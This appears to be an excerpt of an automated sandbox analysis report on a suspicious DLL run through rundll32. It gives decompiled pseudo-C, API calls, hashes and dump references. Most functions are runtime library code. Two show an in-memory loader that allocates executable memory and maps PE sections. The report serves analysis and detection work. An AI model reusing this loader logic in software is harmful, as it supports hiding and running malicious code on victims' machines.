SetLastError.KERNEL32(000000C1,10002159,00000040,10042344,00000000,00000000,10002857,00000000,10002159,10002B5A,10002B49,10002B3B,00000000,?,10002159,00000000), ref: 10002ADF

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$AllocHeap$ErrorFreeLast$Process$InfoNativeSystemund_memcpy
String ID:
API String ID: 4093005746-0
Opcode ID: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction ID: d3499257f24b97b58dc88dd86fbd14561d56403c03c55b35f455527c3641d1ca
Opcode Fuzzy Hash: 0ab2a250ca3eac1d39a73b9ac0c12bbbcad5e6a5782c7eb362b19a931988e4eb
Instruction Fuzzy Hash: 4A71AA71700206AFEB15CF68CD80B59BBF5FF49784F118018E905DB68ADB74EA90CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10003A92, Relevance: 12.1, APIs: 8, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E10003A92(void* __edx) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t57;
				void* _t60;
				void* _t67;
				signed int _t70;
				void* _t73;
				signed int _t74;
				signed int _t78;
				void* _t80;

				_t67 = __edx;
				_push(0x10);
				_push(0x1004af08);
				E100040F0();
				_t34 =  *0x1004dc68; // 0x0
				if(_t34 > 0) {
					 *0x1004dc68 = _t34 - 1;
					 *(_t80 - 0x1c) = 1;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					 *((char*)(_t80 - 0x20)) = E100034F1();
					 *(_t80 - 4) = 1;
					__eflags =  *0x1004dc44 - 2;
					if( *0x1004dc44 != 2) {
						E10003EE0(_t67, 1, _t73, 7);
						asm("int3");
						_push(0xc);
						_push(0x1004af30);
						E100040F0();
						_t70 =  *(_t80 + 0xc);
						__eflags = _t70;
						if(_t70 != 0) {
							L9:
							 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
							__eflags = _t70 - 1;
							if(_t70 == 1) {
								L12:
								_t57 =  *(_t80 + 0x10);
								_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
								 *(_t80 - 0x1c) = _t74;
								__eflags = _t74;
								if(_t74 != 0) {
									_t41 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57); // executed
									_t74 = _t41;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t74;
									if(_t74 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t70 - 2;
								if(_t70 == 2) {
									goto L12;
								} else {
									_t57 =  *(_t80 + 0x10);
									L14:
									_push(_t57);
									_push(_t70);
									_push( *((intOrPtr*)(_t80 + 8)));
									_t42 = E10004518();
									_t74 = _t42;
									 *(_t80 - 0x1c) = _t74;
									__eflags = _t70 - 1;
									if(_t70 == 1) {
										__eflags = _t74;
										if(_t74 == 0) {
											_push(_t57);
											_push(_t42);
											_push( *((intOrPtr*)(_t80 + 8)));
											_t45 = E10004518();
											__eflags = _t57;
											_t25 = _t57 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E10003A92(_t67);
											_pop(_t60);
											E10003C4D( *((intOrPtr*)(_t80 + 8)), _t74, _t57);
										}
									}
									__eflags = _t70;
									if(_t70 == 0) {
										L19:
										_t74 = E10003938(_t60,  *((intOrPtr*)(_t80 + 8)), _t70, _t57);
										 *(_t80 - 0x1c) = _t74;
										__eflags = _t74;
										if(_t74 != 0) {
											_t74 = E10003C4D( *((intOrPtr*)(_t80 + 8)), _t70, _t57);
											 *(_t80 - 0x1c) = _t74;
										}
									} else {
										__eflags = _t70 - 3;
										if(_t70 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t80 - 4) = 0xfffffffe;
							_t40 = _t74;
						} else {
							__eflags =  *0x1004dc68 - _t70; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
						return _t40;
					} else {
						E100035BC(_t60);
						E1000452A();
						E10004591();
						 *0x1004dc44 =  *0x1004dc44 & 0x00000000;
						 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
						E10003B27();
						_t54 = E1000375D( *((intOrPtr*)(_t80 + 8)), 0);
						asm("sbb esi, esi");
						_t78 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t78;
						 *(_t80 - 0x1c) = _t78;
						 *(_t80 - 4) = 0xfffffffe;
						E10003B34();
						_t56 = _t78;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0x10));
					return _t56;
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 10003AD9
___scrt_uninitialize_crt.LIBCMT ref: 10003AF3

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction ID: 7bfdc372d2ca72936bd1731edce63cf54240d63550fca9bbaf8a272257527a9e
Opcode Fuzzy Hash: 7a051707ff0741b05a1ee3ce02520a6e0ff3268bbec48c4d0bc0eb2efb0be8cb
Instruction Fuzzy Hash: 8C41C272D04669ABFB22DF59CC41BAF7BACEB816D5F11C11AF804A715AC7705E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10029C50, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10029C50(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t13;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x1004e548 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x10045368 + _t22 * 4);
						_t13 = LoadLibraryExW(_t23, 0, 0x800); // executed
						_t32 = _t13;
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E10023828(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E10023828(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

api-ms-, xrefs: 10029CA7
ext-ms-, xrefs: 10029CBB

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction ID: 9a454b55204e61d5b080d74c5da724d9454356f1e041ce2ebe6f9b52f1a9641a
Opcode Fuzzy Hash: 00ca16b444452de063b7c347b4828efdadee3ad1140b3dd23fdb962c2a8c0164
Instruction Fuzzy Hash: 44218471A05261BBDB21CB64ED84A4E77D8EF427E1FB20121ED46E7291E770ED00D6E4

Uniqueness

Uniqueness Score: -1.00%

Function 1000D67D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000D67D(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x1004e034 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x100438d8 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E10023828(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

APIs

FreeLibrary.KERNEL32(00000000,?,?,1000D73E,00000000,?,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000), ref: 1000D70D

Strings

api-ms-, xrefs: 1000D6CD

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction ID: 65af02aee665ade10d00ef86524baa454b466fb1c62f40754c56af64b2f9aaab
Opcode Fuzzy Hash: bda9a083905e9972f6869984c368c17e2cf1144b0b7e5e1f4797190f804308a2
Instruction Fuzzy Hash: 0C119431A01666ABEB21EB689C8474D37D4DF027E0F120122EA18EB284E661ED0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 10003B42, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E10003B42(void* __edx) {
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t34;
				void* _t36;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t44;
				void* _t48;

				_t39 = __edx;
				_push(0xc);
				_push(0x1004af30);
				E100040F0();
				_t40 =  *((intOrPtr*)(_t44 + 0xc));
				if(_t40 != 0) {
					L3:
					 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
					if(_t40 == 1 || _t40 == 2) {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						_t42 = E10003C4D( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t42 != 0) {
							_t25 = E10003938(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34); // executed
							_t42 = _t25;
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								goto L8;
							}
						}
					} else {
						_t34 =  *((intOrPtr*)(_t44 + 0x10));
						L8:
						_push(_t34);
						_push(_t40);
						_push( *((intOrPtr*)(_t44 + 8)));
						_t26 = E10004518();
						_t42 = _t26;
						 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
						if(_t40 == 1 && _t42 == 0) {
							_push(_t34);
							_push(_t26);
							_push( *((intOrPtr*)(_t44 + 8)));
							_push((E10004518() & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
							E10003A92(_t39);
							_pop(_t36);
							E10003C4D( *((intOrPtr*)(_t44 + 8)), _t42, _t34);
						}
						if(_t40 == 0 || _t40 == 3) {
							_t42 = E10003938(_t36,  *((intOrPtr*)(_t44 + 8)), _t40, _t34);
							 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							if(_t42 != 0) {
								_t42 = E10003C4D( *((intOrPtr*)(_t44 + 8)), _t40, _t34);
								 *((intOrPtr*)(_t44 - 0x1c)) = _t42;
							}
						}
					}
					 *(_t44 - 4) = 0xfffffffe;
					_t24 = _t42;
				} else {
					_t48 =  *0x1004dc68 - _t40; // 0x0
					if(_t48 > 0) {
						goto L3;
					} else {
						_t24 = 0;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0x10));
				return _t24;
			}

0x10003b42
0x10003b42
0x10003b44
0x10003b49
0x10003b4e
0x10003b53
0x10003b64
0x10003b64
0x10003b6b
0x10003b77
0x10003b84
0x10003b86
0x10003b8b
0x10003b96
0x10003b9b
0x10003b9d
0x10003ba2
0x00000000
0x00000000
0x10003ba2
0x10003b72
0x10003b72
0x10003ba8
0x10003ba8
0x10003ba9
0x10003baa
0x10003bad
0x10003bb2
0x10003bb4
0x10003bba
0x10003bc0
0x10003bc1
0x10003bc2
0x10003bd2
0x10003bd3
0x10003bd8
0x10003bde
0x10003bde
0x10003be5
0x10003bf6
0x10003bf8
0x10003bfd
0x10003c09
0x10003c31
0x10003c31
0x10003bfd
0x10003be5
0x10003c34
0x10003c3b
0x10003b55
0x10003b55
0x10003b5b
0x00000000
0x10003b5d
0x10003b5d
0x10003b5d
0x10003b5b
0x10003c40
0x10003c4c

APIs

dllmain_raw.LIBCMT ref: 10003B7F
dllmain_crt_dispatch.LIBCMT ref: 10003B96
dllmain_raw.LIBCMT ref: 10003BDE
dllmain_crt_dispatch.LIBCMT ref: 10003BF1
dllmain_raw.LIBCMT ref: 10003C04

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction ID: a8148dc8121538fd3aaffcd9e8ee1bf724536045b9f1c5fcd83538124af9b725
Opcode Fuzzy Hash: 81fff7e8ddae1b90393eaad18b17aae06b2df87e031cee5e04bcccc407ad455a
Instruction Fuzzy Hash: 8F21A171D01659ABFB23DE15CC41E6F7BACEB81AD4B02C125FC05A7219C7319E018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001A7D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E10001A7D(intOrPtr _a4, intOrPtr _a8) {
				void* _t4;
				intOrPtr _t8;
				void* _t10;

				_push(0);
				_push(0x40);
				_push(0x3000);
				_push(_a8);
				_push(0);
				_t4 = GetCurrentProcess();
				_push(_t4); // executed
				L10002C92(); // executed
				_t8 =  *0x1004d028; // 0x0
				_t10 = _t4;
				_t9 =  !=  ? 0 : _t8;
				 *0x1004d028 =  !=  ? 0 : _t8;
				E100045C0(_t10, _a4, _a8);
				return _t10;
			}

0x10001a81
0x10001a83
0x10001a85
0x10001a8a
0x10001a8d
0x10001a8f
0x10001a95
0x10001a96
0x10001a9e
0x10001aa4
0x10001aae
0x10001ab1
0x10001ab7
0x10001ac3

APIs

GetCurrentProcess.KERNEL32(00000000,?,00003000,00000040,00000000,LdrFindResource_U,?,10001EF1,LdrFindResource_U,00000000,LdrFindResource_U), ref: 10001A8F
VirtualAllocExNuma.KERNEL32 ref: 10001A96

Strings

LdrFindResource_U, xrefs: 10001A80

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: AllocCurrentNumaProcessVirtual
String ID: LdrFindResource_U
API String ID: 346376999-1041023618
Opcode ID: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction ID: d0a16a8f04b34dc33bb485e690be2f78af7230e4dc145071e4a6e5a959ba9fd3
Opcode Fuzzy Hash: 4c02bb6aea739f849601bb6fdcb21d7ba60705c9ec75e1d4b7f00a3d6f85dbfa
Instruction Fuzzy Hash: A2E04879B413247BEB215BA59C45F553F98DB097B1F004021FF0CDA291D571DD5087D8

Uniqueness

Uniqueness Score: -1.00%

Function 100316BB, Relevance: 4.7, APIs: 3, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E100316BB(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				intOrPtr _v12;
				void* _v24;
				void* __ebp;
				signed int _t41;
				signed int _t49;
				void* _t51;
				void* _t53;
				signed int _t55;
				intOrPtr _t62;
				intOrPtr _t67;
				intOrPtr* _t70;
				intOrPtr _t84;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t93;
				signed int _t94;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				void* _t101;

				_push(__ecx);
				_push(__ecx);
				_t41 =  *0x1004d054; // 0x940b3682
				_v8 = _t41 ^ _t94;
				_t91 = _a20;
				if(_t91 > 0) {
					_t67 = E10038A7E(_a16, _t91);
					_t101 = _t67 - _t91;
					_t4 = _t67 + 1; // 0x1
					_t91 = _t4;
					if(_t101 >= 0) {
						_t91 = _t67;
					}
				}
				_t86 = _a32;
				if(_a32 == 0) {
					_t86 =  *((intOrPtr*)( *_a4 + 8));
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				_t84 = E10028AFC(_t86, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t91, 0, 0);
				_t96 = _t95 + 0x18;
				_v12 = _t84;
				if(_t84 == 0) {
					L39:
					return E100037EA(_t46, _v8 ^ _t94, _t84);
				} else {
					_t17 = _t84 + _t84 + 8; // 0x8
					asm("sbb eax, eax");
					_t49 = _t84 + _t84 & _t17;
					if(_t49 == 0) {
						_t70 = 0;
						L15:
						if(_t70 == 0) {
							L37:
							_t93 = 0;
							L38:
							E1002E63A(_t70);
							_t46 = _t93;
							goto L39;
						}
						_t51 = E10028AFC(_t86, 1, _a16, _t91, _t70, _t84);
						_t98 = _t96 + 0x18;
						if(_t51 == 0) {
							goto L37;
						}
						_t88 = _v12;
						_t53 = E1002A3D2(_a8, _a12, _t70, _v12, 0, 0, 0, 0, 0); // executed
						_t93 = _t53;
						if(_t93 == 0) {
							goto L37;
						}
						_t84 = 0x400;
						if((_a12 & 0x00000400) == 0) {
							_t31 = _t93 + _t93 + 8; // 0x8
							asm("sbb eax, eax");
							_t55 = _t93 + _t93 & _t31;
							if(_t55 == 0) {
								_t89 = 0;
								L31:
								if(_t89 == 0 || E1002A3D2(_a8, _a12, _t70, _v12, _t89, _t93, 0, 0, 0) == 0) {
									L36:
									E1002E63A(_t89);
									goto L37;
								} else {
									_push(0);
									_push(0);
									if(_a28 != 0) {
										_push(_a28);
										_push(_a24);
									} else {
										_push(0);
										_push(0);
									}
									_push(_t93);
									_push(_t89);
									_push(0);
									_push(_a32);
									_t93 = E10028BDD();
									if(_t93 != 0) {
										E1002E63A(_t89);
										goto L38;
									} else {
										goto L36;
									}
								}
							}
							if(_t55 > 0x400) {
								_t89 = E10024214(_t55);
								if(_t89 == 0) {
									goto L36;
								}
								 *_t89 = 0xdddd;
								L29:
								_t89 = _t89 + 8;
								goto L31;
							}
							E1003F9B0();
							_t89 = _t98;
							if(_t89 == 0) {
								goto L36;
							}
							 *_t89 = 0xcccc;
							goto L29;
						}
						_t62 = _a28;
						if(_t62 == 0) {
							goto L38;
						}
						if(_t93 > _t62) {
							goto L37;
						}
						_t93 = E1002A3D2(_a8, _a12, _t70, _t88, _a24, _t62, 0, 0, 0);
						if(_t93 != 0) {
							goto L38;
						}
						goto L37;
					}
					if(_t49 > 0x400) {
						_t70 = E10024214(_t49);
						if(_t70 == 0) {
							L13:
							_t84 = _v12;
							goto L15;
						}
						 *_t70 = 0xdddd;
						L12:
						_t70 = _t70 + 8;
						goto L13;
					}
					E1003F9B0();
					_t70 = _t96;
					if(_t70 == 0) {
						goto L13;
					}
					 *_t70 = 0xcccc;
					goto L12;
				}
			}

0x100316c0
0x100316c1
0x100316c2
0x100316c9
0x100316ce
0x100316d4
0x100316da
0x100316e0
0x100316e3
0x100316e3
0x100316e6
0x100316e8
0x100316e8
0x100316e6
0x100316ea
0x100316ef
0x100316f6
0x100316f9
0x100316f9
0x1003171a
0x1003171c
0x1003171f
0x10031724
0x10031882
0x10031893
0x1003172a
0x1003172d
0x10031732
0x10031734
0x10031736
0x1003176d
0x1003176f
0x10031771
0x10031877
0x10031877
0x10031879
0x1003187a
0x10031880
0x00000000
0x10031880
0x10031780
0x10031785
0x1003178a
0x00000000
0x00000000
0x10031790
0x100317a2
0x100317a7
0x100317ab
0x00000000
0x00000000
0x100317b1
0x100317b9
0x100317f6
0x100317fb
0x100317fd
0x100317ff
0x10031830
0x10031832
0x10031834
0x10031870
0x10031871
0x00000000
0x10031851
0x10031853
0x10031854
0x10031858
0x10031894
0x10031897
0x1003185a
0x1003185a
0x1003185b
0x1003185b
0x1003185c
0x1003185d
0x1003185e
0x1003185f
0x10031867
0x1003186e
0x1003189d
0x00000000
0x00000000
0x00000000
0x00000000
0x1003186e
0x10031834
0x10031803
0x1003181e
0x10031823
0x00000000
0x00000000
0x10031825
0x1003182b
0x1003182b
0x00000000
0x1003182b
0x10031805
0x1003180a
0x1003180e
0x00000000
0x00000000
0x10031810
0x00000000
0x10031810
0x100317bb
0x100317c0
0x00000000
0x00000000
0x100317c8
0x00000000
0x00000000
0x100317e4
0x100317e8
0x00000000
0x00000000
0x00000000
0x100317ee
0x1003173d
0x10031758
0x1003175d
0x10031768
0x10031768
0x00000000
0x10031768
0x1003175f
0x10031765
0x10031765
0x00000000
0x10031765
0x1003173f
0x10031744
0x10031748
0x00000000
0x00000000
0x1003174a
0x00000000
0x1003174a

APIs

__freea.LIBCMT ref: 10031871

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

__freea.LIBCMT ref: 1003187A
__freea.LIBCMT ref: 1003189D

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __freea$AllocateHeap
String ID:
API String ID: 2243444508-0
Opcode ID: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction ID: 7876994cb8969f5935bcb3e1c2cca68d888c4b8f452257783c78087195ffa41b
Opcode Fuzzy Hash: 8d6a3bb3c0f4b8fd41e009e8b6b57536dd7696980958e54c51c196cfdfe389cd
Instruction Fuzzy Hash: 8B51C276600216AFEB12CF64DC41EEB37F9EF49691F264129FD04AB150DB31EC11D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 100023D8, Relevance: 4.6, APIs: 3, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E100023D8(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _t29;
				void* _t31;
				void* _t37;
				intOrPtr* _t51;
				intOrPtr _t54;
				void* _t59;
				intOrPtr* _t61;
				intOrPtr _t66;
				signed int _t68;
				long _t69;
				void* _t70;

				_push(__ecx);
				_push(__ecx);
				_v12 = _v12 & 0x00000000;
				_t51 = _a16;
				_v8 = __ecx;
				_t29 =  *_t51;
				_t5 = _t51 + 4; // 0x408b078b
				_t54 =  *_t5;
				_a16 = _t54;
				_t59 = ( *(_t29 + 0x14) & 0x0000ffff) + 0x24;
				if(0 >=  *((intOrPtr*)(_t29 + 6))) {
					L11:
					_t31 = 1;
				} else {
					_t61 = _t59 + _t29;
					do {
						if( *(_t61 + 4) != 0) {
							if(E100023BA(_a8,  *((intOrPtr*)(_t61 + 8)) +  *(_t61 + 4)) == 0) {
								goto L13;
							} else {
								_t37 = VirtualAlloc( *_t61 + _a16,  *(_t61 + 4), 0x1000, 4); // executed
								if(_t37 == 0) {
									goto L13;
								} else {
									_t66 =  *_t61 + _a16;
									E10002C22(_t66,  *((intOrPtr*)(_t61 + 8)) + _a4,  *(_t61 + 4));
									 *((intOrPtr*)(_t61 - 4)) = _t66;
									goto L9;
								}
							}
						} else {
							_t69 =  *(_a12 + 0x38);
							if(_t69 <= 0) {
								goto L10;
							} else {
								if(VirtualAlloc( *_t61 + _t54, _t69, 0x1000, 4) == 0) {
									L13:
									_t31 = 0;
								} else {
									 *((intOrPtr*)(_t61 - 4)) =  *_t61 + _a16;
									E10002BFD( *_t61 + _a16, 0, _t69);
									L9:
									_t70 = _t70 + 0xc;
									_t54 = _a16;
									goto L10;
								}
							}
						}
						goto L12;
						L10:
						_t61 = _t61 + 0x28;
						_t68 = _v12 + 1;
						_v12 = _t68;
					} while (_t68 < ( *( *_t51 + 6) & 0x0000ffff));
					goto L11;
				}
				L12:
				return _t31;
			}

0x100023db
0x100023dc
0x100023dd
0x100023e4
0x100023eb
0x100023ee
0x100023f0
0x100023f0
0x100023f3
0x100023fa
0x10002401
0x100024af
0x100024b1
0x10002407
0x10002407
0x10002409
0x1000240d
0x1000245a
0x00000000
0x1000245c
0x1000246c
0x10002474
0x00000000
0x10002476
0x10002481
0x10002486
0x1000248b
0x00000000
0x1000248b
0x10002474
0x1000240f
0x10002412
0x10002417
0x00000000
0x10002419
0x1000242e
0x100024b9
0x100024b9
0x10002434
0x1000243d
0x10002440
0x1000248e
0x10002491
0x10002494
0x00000000
0x10002494
0x1000242e
0x10002417
0x00000000
0x10002497
0x10002499
0x1000249f
0x100024a0
0x100024a7
0x00000000
0x10002409
0x100024b2
0x100024b6

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,00000000,00000000,?,10002A49,00000000,10002159), ref: 10002426
